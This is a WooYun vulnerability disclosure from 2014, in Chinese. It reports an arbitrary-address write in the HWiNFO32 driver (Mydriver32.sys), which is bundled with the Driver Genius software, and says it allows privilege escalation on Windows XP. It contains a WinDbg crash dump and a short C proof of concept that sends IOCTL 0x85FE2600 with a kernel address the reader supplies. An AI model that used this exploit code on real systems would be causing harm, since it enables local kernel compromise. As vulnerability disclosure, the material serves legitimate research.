当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077279

漏洞标题:HWiNFO32驱动任意地址写固定数据

相关厂商:驱动精灵

漏洞作者: ywledoc

提交时间:2014-09-29 17:45

修复时间:2014-12-28 17:46

公开时间:2014-12-28 17:46

漏洞类型:权限提升

危害等级:高

自评Rank:18

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-12-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

HWiNFO32驱动过滤不严,造成任意地址写固定数据漏洞。驱动精灵中包含HWiNFO32,其名称为Mydriver32.sys

详细说明:

对DeviceIoControl例程中,当IoControlCode=0x85FE2600时,不严格过滤用户传入的 lpOutBuffer参数,直接调用nt!IopfCompleteRequest后,经过一系列处理,最终在nt!IopCompleteRequest产生漏洞,可写任意地址。
因其最终引发在nt!IopCompleteRequest,所以也于系统相关经测试xpsp3可正常利用,win7则没有影响。

漏洞证明:

windbg崩溃信息。

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ffff0000, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 804ed09b, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
WRITE_ADDRESS:  ffff0000 
FAULTING_IP: 
nt!IopCompleteRequest+92
804ed09b f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
MM_INTERNAL_CODE:  0
DEFAULT_BUCKET_ID:  CODE_CORRUPTION
BUGCHECK_STR:  0x50
PROCESS_NAME:  TestMyDriver32_
IRP_ADDRESS:  82177f68
DEVICE_OBJECT: 81d5f518
DRIVER_OBJECT: 81d26288
IMAGE_NAME:  DgSafe.sys
DEBUG_FLR_IMAGE_TIMESTAMP:  540684f3
MODULE_NAME: DgSafe
FAULTING_MODULE: b1250000 mydrivers32
TRAP_FRAME:  b137f91c -- (.trap 0xffffffffb137f91c)
ErrCode = 00000002
eax=00000110 ebx=82177f68 ecx=00000044 edx=00000001 esi=81f24680 edi=ffff0000
eip=804ed09b esp=b137f990 ebp=b137f9d4 iopl=0         nv up ei pl nz na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010206
nt!IopCompleteRequest+0x92:
804ed09b f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
Resetting default scope
LAST_CONTROL_TRANSFER:  from 80533797 to 804e450a
STACK_TEXT:  
b137f46c 80533797 00000003 ffff0000 00000000 nt!RtlpBreakWithStatusInstruction
b137f4b8 8053426e 00000003 806f2298 c03fffc0 nt!KiBugCheckDebugBreak+0x19
b137f898 8053485e 00000050 ffff0000 00000001 nt!KeBugCheck2+0x574
b137f8b8 805251a8 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b
b137f904 804e2747 00000001 ffff0000 00000000 nt!MmAccessFault+0x6f5
b137f904 804ed09b 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc
b137f9d4 804ed11a 82177fa8 b137fa20 b137fa14 nt!IopCompleteRequest+0x92
b137fa24 806f2c35 00000000 00000000 b137fa3c nt!KiDeliverApc+0xb3
b137fa24 806f2861 00000000 00000000 b137fa3c hal!HalpApcInterrupt+0xc5
b137faac 804e63cc 82177fa8 82177f68 00000000 hal!KeReleaseInStackQueuedSpinLock+0x11
b137facc 804ed134 82177fa8 81d2d588 00000000 nt!KeInsertQueueApc+0x4b
b137fb00 b1251f27 81d2d588 81d26288 82177f68 nt!IopfCompleteRequest+0x1d8
WARNING: Stack unwind information not available. Following frames may be wrong.
b137fc34 804e4767 81d5f518 82177f68 806f22d0 mydrivers32+0x1f27
b137fc44 805692ab 82177fd8 81d2d588 82177f68 nt!IopfCallDriver+0x31
b137fc58 805781e2 81d5f518 82177f68 81d2d588 nt!IopSynchronousServiceTail+0x70
b137fd00 8057a705 00000054 00000000 00000000 nt!IopXxxControlFile+0x611
b137fd34 804df7f8 00000054 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
b137fd34 7c92e514 00000054 00000000 00000000 nt!KiSystemServicePostCall
0013fed8 7c92d28a 7c801675 00000054 00000000 ntdll!KiFastSystemCallRet
0013fedc 7c801675 00000054 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc
0013ff3c 00401058 00000054 85fe2600 0013ff68 kernel32!DeviceIoControl+0xdd
0013ff68 00401083 00000000 0040302c 78542201 TestMyDriver32_b!TestMyDriver32+0x58 [e:\code_src\c\testmydriver32\testmydriver32\testmydriver32.cpp @ 29]
0013ff7c 0040120f 00000001 00033d48 000328b8 TestMyDriver32_b!wmain+0x13 [e:\code_src\c\testmydriver32\testmydriver32\testmydriver32.cpp @ 37]
0013ffc0 7c816037 0558ee60 7c92d96e 7ffdf000 TestMyDriver32_b!__tmainCRTStartup+0x10f [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 579]
0013fff0 00000000 00401357 00000000 78746341 kernel32!BaseProcessStart+0x23
STACK_COMMAND:  kb
CHKIMG_EXTENSION: !chkimg -lo 50 -d !nt
    804df7da-804df7df  6 bytes - nt!KiSystemServiceAccessTeb+2c
	[ 8b fc f6 45 72 02:e9 ce 15 b5 31 90 ]
    80586896-80586899  4 bytes - nt!NtTerminateProcess+4b
	[ ce f4 fd ff:ad 49 a9 31 ]
    806319c6-806319c9  4 bytes - nt!NtTerminateJobObject+2d (+0xab130)
	[ 9e 43 f3 ff:cd 98 9e 31 ]
14 errors : !nt (804df7da-806319c9)
FOLLOWUP_NAME:  MachineOwner
MEMORY_CORRUPTOR:  PATCH_DgSafe
FAILURE_BUCKET_ID:  MEMORY_CORRUPTION_PATCH_DgSafe
BUCKET_ID:  MEMORY_CORRUPTION_PATCH_DgSafe
Followup: MachineOwner
---------


利用测试代码:

VOID TestMyDriver32()
{
	HANDLE	hCreateFile = INVALID_HANDLE_VALUE;
	DWORD	dwInBuffer = 0x6c77792a;
	DWORD	dwOutBuffer = 0xf8be8020;//内核可写地址请自行更改
	hCreateFile = CreateFileA("\\\\.\\HWiNFO32",                    
					0,                // no access to the drive
					FILE_SHARE_READ | // share mode
					FILE_SHARE_WRITE,
					NULL,             // default security attributes
					OPEN_EXISTING,    // disposition
					0,                // file attributes
					NULL);
	if (hCreateFile == INVALID_HANDLE_VALUE)
	{
		printf("Error Open Device!\n");
		return ;
	}
	DeviceIoControl(hCreateFile, 0x85FE2600, (LPVOID)&dwInBuffer, 4, (LPVOID)dwOutBuffer, 0, &dwInBuffer, NULL);
	CloseHandle(hCreateFile);
	return;
}
int _tmain(int argc, _TCHAR* argv[])
{
	char cSSS[10];
	TestMyDriver32();
	scanf("%s",cSSS);
	return 0;
}


QQ图片20140925133039.jpg

修复方案:

开发人员更懂

版权声明:转载请注明来源 ywledoc@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝